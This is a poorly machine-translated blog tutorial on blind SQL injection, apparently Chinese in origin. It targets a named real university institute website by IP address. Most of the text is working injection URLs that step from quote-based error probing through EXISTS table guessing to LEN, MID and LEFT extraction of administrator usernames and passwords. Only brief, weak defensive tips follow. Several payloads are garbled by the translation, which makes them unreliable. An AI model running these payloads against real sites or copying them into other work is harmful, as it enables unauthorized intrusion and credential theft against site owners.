Author: Ice Race
I don't know when I wrote, I will turn out when I finish computer these days, look at the idea, other values. ============================================================================================================================================================================================================= ====== Description: reproduced also please indicate: ice race in addition, as I analyze this process more real, more readers a better understanding of each, so with real time analysis of IP injection site is real Yes: http://202.114.71.194/ Wuhan University Environmental Law Institute, for this reason, I hope that everyone should not be destroyed, just for learning, if there is any unexpected place, the profile has nothing to do ============================================================================================================================================================================================================= ======
Today, I mainly analyze SQL injection, but by the way, it will also talk about Access's judgment and provide some website security recommendations. Since now a lot of websites are on the firewall, then the programmer is a little attention, and the administrator is responsible for it. We are very difficult to use these vulnerabilities, or the sentence, as long as you defense, you will take a while, The hacker may not have so much patience where you are, hey, you will. . . . . . . . . Simply talk about the injection, that is, the attacker submits some code in IE, and these code may be the command of some languages of the program when joining the query, it is to join the current process of running the program to run back, thus Attack. I am talking about SQL today, so you have to have a certain SQL language basis. Alternatively, it is necessary to use the return of the error, and make judgments, so you have to set your IE, tool -> Internet option -> Advanced -> Show friendly HTTP error message before. This will return the wrong prompt.
First of all, I may know that I will try a single quotation. Take a look at the homepage of http://202.114.71.194/, open a page, I open http://202.114.71.194/show.asp?id=763 'Returns the following: ---- -------------------------------------------------- ---------------------------------- Microsoft Ole DB Provider for ODBC Drivers Errors '80040e14'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] unclosed Quotation Mark Before The Character String '' ./show.asp, line 47 -------------------- -------------------------------------------------- ----------------- Perhaps someone will say, you are lucky, this website can be injected, huh, I am injecting, in fact, I have already found it has this vulnerability. , Today, I will use it for everyone ----------- Programmaker's big mistake If you return to another website, it is: ---------- -------------------------------------------------- ---------------------------- Microsoft Jet Database Engine error '80040e14' string syntax error in Query Expression 'ID = 56' '. /SHOWDETAIL.ASP, line 8 ------------------------------------------- -------------------------------------------- this is Access's database .
At the same time, in this step we generally try the following: http://202.114.71.194/show.asp?id=763 and 1=1 http://202.114.71.194/show.asp?id=763 % 20AND% 201 = 2 This sentence is obviously established, returning is http://202.114.71.194/show.asp?id=763, and the second sentence is of course not establishing returning is not this page. (% 20 here, if the rookie does not know, I said, it is a space), the second step, in the first step we know that it is using the ASP SQL, let's of course find the administrator to find it. The username and password are, I am looking for this, of course, what is the name of this username and password? That how to know the table name, mainly to see the source file, and it is guess, most of which have rules. At the same time, I have to find his management entrance, there is all possible means to find it, you can guess, such as longin.asp, admin.asp, ad_login.asp, etc. I guess the entrance of this website is: http:// 202.114.71.194/login.as is actually in the eyes, or you can also see if there is a management entry on the homepage of their website? You don't have to guess ------- Administrator's big mistake is this time, we also have to find his administrator table in what table, try http://202.114.71.194/show .asp? id = 763% 20And% 20EXISTS% 20 (select% 20 *% 20FROM% 20Login) In this case you can try to change the login to User, Admin, and so on, if it returns to this page is the same, Then you will guess it. This page is http://202.114.71.194/show.asp?id=763
The third step, there is a table name, of course, it is the column of guessing, usually there is 3 columns, ID number, user name, password, is trying to try http://202.114.71.194/show .asp? id = 763% 20And% 20Exists% 20 (select% 20ID% 20FROM% 20Login) http://202.114.71.194/show.asp?id=763 and Exists (select% 20USERNAME% 20FROM% 20Login) http://202.114.71.194/show.asp?id=763 and exists (select% 20Password% 20FROM% 20Login) After N times submission, finally found (not easy to do hackers, hard work Live) I tried the user listed as User, the password is column for password. Fourth step, to guess what ID number in this table is there, the statement is http://202.114.71.194/show. ASP? ID = 763% 20And% 20Exists% 20 (select% 20ID% 20FROM% 20Login% 20where% 20ID = 1) Here you can change this ID = 1 to ID = 2, 3, 4, 5 .... ...tried
The fifth step, guess the length of the username, http://202.114.71.194/show.asp? Id = 763and% 20Exists% 20 (select% 20ID% 20FROM% 20Login% 20where% 20LEN (user) = 1% 20and % 20ID = 1) Here you need to try Len (username) = 1, 2, 3, 4 ... Try to return correctly, this step is easier, up to 10 times, I will try this time. Out of its length is 7 (of course, I tried the user of ID = 1)
The sixth step, guess the various constituents of the username inside, huh, is not a letter, but the Chinese characters can be miserable http://202.114.71.194/show.asp?id=763 exists ( Select% 20ID% 20FROM% 20Login% 20where% 20Login% 20where% 20ASC (MID (User, 1, 1))> 110% 20and% 20ID = 1) Sometimes it is possible to try the next
http://202.114.71.194/show.asp?id=763 Exists (select% 20ID% 20FROM% 20Login% 20where% 20LEFT (user, 1) = a) Here mainly this is this test Left (user, 1 ) = a, b, c, d, ................................................................................................................................................................................................................ , Just I can't think about it now. If you have a better way to try it here, please tell me, teach me, learn from each other (Oh, if you want me, this apprentice, I am really willing)
In the last step, change USER to Password, I have made the password, but I didn't try it, or the workload is big, so this article is simply introducing the injection.
Below I will simply say, how to prevent such problems. 1. When programming, the single quotes and other special symbols are filtered away, and if possible, add the limited user through the IE input length can be implemented by the programmer or all firewall.
2, the administrator's thing, change the entrance to the entrance to have no rules, hide, so that the attacker can not find the injected place, especially don't make a clear-eyed, put the management entrance in the home page, this is not clear white to the attacker Say, is it to attack me?
3, possible words, delete the page of the management entry, so although it is a bit inconvenient, it will pass it when you use it. This achieves no entrance.
Ok, I said so much, it should be finished, if there is any place in the article, I hope you can point out. My email is animeihong@sina.com. In addition, this article is used in this article. Because the anti-readers use to attack this website, I sometimes change the correct result of the tried, I hope you don't want to destroy
